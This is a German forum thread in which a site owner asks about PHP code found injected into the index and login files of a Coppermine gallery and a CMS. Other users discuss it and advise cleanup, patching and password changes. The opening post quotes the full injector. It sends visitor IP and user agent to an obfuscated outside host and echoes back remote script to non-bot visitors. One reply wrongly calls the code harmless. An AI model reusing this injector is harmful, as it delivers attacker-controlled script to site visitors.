Seltsamer Code zugekommen

[markowski54]

Abend in der Runde,
auf dem Webspace und unter bestimmten Verzeichnissen (am meisten index und login) taucht folgendes Code auf:

<?php
#35c73a#
error_reporting(0); ini_set('display_errors',0); $wp_d85 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_d85) && !preg_match ('/bot/i', $wp_d85))){
$wp_d0985="http://"."http"."title".".com/title"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_d85);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_d0985);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_85d = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_85d,1,3) === 'scr' ){ echo $wp_85d; }
#/35c73a#
?>

In der Folge, ich sehe bestimmte Sachen nicht mehr bzw. betroffene Scripte zeigen sich gar nicht mehr.
Was bedeutet das ? Soll ich mir Sorgen machen? Gehackt..?
--
Danke für jedes Rat..

 

[Verata]

Lad die Dateien mal bei Virus Total hoch.

 

[Rossie]

Yep, hier treibt ein Bot sein Unwesen!

 

[markowski54]

Hallo,
Virustotal sagt nichts.
Wenn Bot, dann wie hat er Zusätze eingepflanzt ? Ist kein free Hoster.. aber laut Netz nicht besonders beliebt.
thx..

 

[Tigerass 2.0]

Ja hat was mit bots zu tun, und zwar mit den bots der Suchmaschinen wie z.B. Googlebot (Google danach, hat sogar nen wikiartikel).
Da dein browser bei jeder anfrage einen useragent-string mitschickt (HTTP_USER_AGENT), und dieser für jede Browserversion / Typ unterschiedlich ist, haben auch suchmaschinenbots so einen useragent-string. Meist kommt darin das Wort bot vor, wonach hier gesucht wird. whatsmyuseragent.com zeigt dir deinen Useragent an.
Hab mir nicht angeschaut was der Code macht, aber nichts schlimmes. Ich glaube er sendet nur ein paar Benutzerdaten (useragent/ip) an ein Auswertungsscript, falls es sich bei dem Besucher der Seite nicht um einen Bot handelt. Wahrscheinlich für eine Statistik oder so.

Was für dumme Kommentare hier zum Teil...

 

[markowski54]

Danke dir..
wobei ich habe keine Ahnung wie das zugekommen ist. Kurz erweitere ich noch...
Seite liegt html geschrieben. Da gibt es keine Veränderung. Zusätzlich liegt Coppermine in einem Ordner (Bildgalerie). Dort sind sämtliche *.php mit der Veränderung sichtbar. Der Ordner Coppermine ist nicht frei (amtlich) gegeben.
Zu Testzwecken habe ich noch ein CMS drauf. Dort sind auch index und login Dateien mit dem Zusatz-Code verändert. Der Inhalt ist ebenso nicht frei gegeben.

Was ganz wichtig ist... auf Grund der Veränderung funktionieren beide Scripte nicht mehr. Coppermine zeigt SQL-Error und CMS nur weiße Seite.. Klar ich kann den Code überall löschen und hoffen das wieder parat wird. Zuvor wollte allerdings nach Rat fragen.
--

 

[gEexTaH]

Klingt nach einem Script was durch eine Schwachstelle in einer PHP Anwendung eingedrungen ist und automatisch alle *.php Dateien umgeschrieben hat.
Auch wenn der Code augenscheinlich nicht schädlich zu sein scheint, sondern nur Statistiken erfasst, ist dein Webspace kompromittiert.

In erster Linie solltest du überprüfen ob das Problem durch veraltete Software zustande gekommen ist, sollte das der Fall sein - updaten. Danach den Hoster informieren und alle FTP Passwörter ändern.

Das ganze scheint so nicht weiter dramatisch zu sein, nur sollte tatsächlich eine Sicherheitslücke auf deinen Space bestehen, könnte der nächste Angriff anderen Code mit sich bringen.

 

[Tigerass 2.0]

stackoverflow.com/questions/20975107/unauthorised-code-placed-on-web-pages

usw. Habe ziemlich viel drüber gefunden wenn man sucht. Der php code ansich macht nichts schlimmes, aber der geladene content womöglich. Kann mir das leider nicht genauer anschauen. Benutzt du zufälligerweise wordpress?

Ist wahrscheinlich von nem autoexploit gekommen das ding (also browser von usern mit malware welche nach opfern suchen oder einfach ein script), musst die schwachstelle finden.
Die domain des exploits ist noch on, habe nen abuse request gesendet. Schau mir das genauer an wenn ich daheim bin. Geht nach China das ding und registrant wie üblich anonym.

 

[Daaron]

Du wurdest gehackt (bzw. dein Webspace). Dir wird nichts anderes übrig bleiben als:
- alle PHP-Scripte vom Server entfernen und die Versionen auf Sicherheitslücken prüfen. Dann sauber und lückenlos neu aufspielen
- die Passwörter für FTP und Datenbank ändern <- ganz wichtig

Und dann musst du hoffen, dass der Fehler auch wirklich bei dir lag und dein Hoster nicht ein schwerwiegendes Problem in SEINER Sicherheitspolitik hat und jemand von einem anderen Platz dein System kompromittieren konnte. Wenn das der Fall war: Hoster wechseln.

 

[markowski54]

Danke für eure Beteiligung,
da wird der Hoster gewechselt. Ist leider eine Niete.
Ich habe ziemlich frische Backups extern, hoffe klappt wie gewünscht.

Benutzt du zufälligerweise wordpress?

Nein, ist die Vorphase von CMSimple. Wg. Umstellung eventuell..
--
Gruß

 

[Daaron]

Du weißt aber nicht mit Sicherheit, ob der Hoster gepfuscht hat, oder obs an CMSimple lag. Evtl. hat das einige hübsche Lücken.

 

[markowski54]

Alle Indizien zeigen aber den Hoster.
Die Ordner, was ich erwähnt habe, sind nicht öffentlich zugänglich. Beliebiger Pfad../rsfencmdje was ich nur kenne. Damit ist gleichzeitig Coppermine und CMSimple gemeint, also zwei verschiedene Scripte die um gleiche Zeit was abbekommen haben. Seit ca 1 Monat regelmäßig ab 1 Uhr Nacht ist der Aufruf der Domain nicht möglich. Ab 6 Uhr geht wieder. Support *lieber nichts sagen*, Hottline nur über 0900..

Na ja mehr möchte ich nicht sagen. Vielleicht nur das, Coppermine geht bei einem anderen Anbieter seit 2007. Völlig problemlos.
-